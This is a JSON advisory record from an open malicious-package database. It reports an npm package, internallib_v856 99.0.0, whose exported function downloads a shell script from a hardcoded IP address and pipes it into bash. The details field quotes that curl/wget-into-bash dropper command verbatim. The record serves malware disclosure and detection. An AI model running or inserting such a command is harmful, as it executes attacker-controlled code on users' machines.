{
  "id": "MAL-2026-5694",
  "summary": "Malicious code in internallib_v856 (npm)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a)\nThe package's main entry (index.js) exports a single function `command()` that invokes `/bin/bash -c \"curl -s http://10.0.0.145:8080/shell.sh | bash || wget -qO- http://10.0.0.145:8080/shell.sh | bash\"`, fetching an unauthenticated shell script over plain HTTP from a hardcoded bare-IP endpoint and piping it directly into bash. Any consumer that requires this package and calls the advertised API will execute attacker-controlled code on their machine. The package metadata is a generic placeholder (`name: internallib_v856`, description `Internal lib for testing`, no author, no repository), and the package's only advertised function is the dropper itself — there is no legitimate functionality. Network destination http://10.0.0.145:8080/shell.sh is mutable, attacker-controlled, and unverifiable.\n",
  "modified": "2026-06-12T16:46:41.927839711Z",
  "published": "2026-06-12T15:28:22Z",
  "database_specific": {
    "malicious-packages-origins": [
      {
        "sha256": "d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a",
        "import_time": "2026-06-12T16:32:16.436781596Z",
        "source": "amazon-inspector",
        "id": "IN-MAL-2026-005788",
        "versions": ["99.0.0"],
        "modified_time": "2026-06-12T15:28:22Z"
      }
    ]
  },
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/internallib_v856/v/99.0.0"
    }
  ],
  "affected": [
    {
      "package": {
        "name": "internallib_v856",
        "ecosystem": "npm",
        "purl": "pkg:npm/internallib_v856"
      },
      "versions": ["99.0.0"],
      "database_specific": {
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v856/MAL-2026-5694.json",
        "cwes": [
          {
            "cweId": "CWE-506",
            "name": "Embedded Malicious Code",
            "description": "The product contains code that appears to be malicious in nature."
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "sha256": "cf43855c54b0e8af2eb86b9fcb23e09e60d9993c38e99848b313c5cac0328ecd",
              "tlsh": "8bf09e4a04ea203d6ba63474ee9a7c26306749125138c551ba8fc1261f8440852ba7dc",
              "path": "index.js"
            },
            {
              "tlsh": "01c04cb15516582324d543a45ca1890966664e2b5006a5095b672a0d40ea9b759b9b0c",
              "sha256": "5d850d9a3b56882cc7172b51fad29ed24d3eebb822f385b9f79861007b66521a",
              "path": "package.json"
            }
          ],
          "package_integrity": [
            {
              "hashes": {
                "sha512_sri": "sha512-4XGG32TJnnUYjVwUMgjKmCpVJLOGrkMhh4/mI+rspVP32nDRrUp6JR/FJzkV4o9xqJEudmlaOrF6QCUCfGwR2g==",
                "sha1": "835ca042490b9c353d6289db2ec942584671d508"
              },
              "filename": "internallib_v856-99.0.0.tgz"
            }
          ]
        }
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {
      "name": "Amazon Inspector",
      "contact": ["inspector-research@amazon.com"],
      "type": "FINDER"
    }
  ]
}